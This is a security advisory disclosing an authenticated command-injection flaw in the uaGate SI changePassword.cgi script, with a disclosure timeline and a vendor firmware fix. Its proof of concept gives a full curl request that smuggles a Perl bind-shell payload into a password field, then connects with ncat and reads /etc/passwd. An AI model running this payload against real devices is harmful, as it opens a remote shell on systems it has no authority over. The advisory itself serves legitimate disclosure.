abstract:
A cgi script of the uaGate SI handles its parameters in an unsafe fashion. Maliciously carfted url parameters can transfere an arbitrary command payload that is executed with the rights of the webserver. The command output returned to stdout is returned by the Webserver in response to the malicious web request.
attack vector
An authenticated attacker can execute arbitrary commands by issuing a web request.
proof of concept details
curl http://uagate/cgi-bin/changePassword.cgi -d "newPassword=*******&confirmPassword=*******&user=mfadmin&oldPassword=*******+%26%26+perl+-e+%27use+Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C+INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose+C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash+-i%22%29%3B%7D%3B%27" --user mfadmin:****** & (sleep 1; ncat uagate 4223)
cat /etc/passwd
attack Scenario
This exploit can be used in an exploit chain together with a privilege escalation vulnerability to gain complete control over the target device.
timeline
- day 0 - re-test of uaGate SI Device - 07.08.2019
- day 7 - CVE ID issued by MITRE - 14.08.2019
- day 47 - issue report to manufacturer - 23.09.2019
- day 61 - manufacurer ackloknowledged security issues - 07.10.2019
- day 63 - fix found in Firmware 1.72.00.1996 - 09.10.2019
- day 64 - released - 10.10.2019
credits
rfr@mioso.com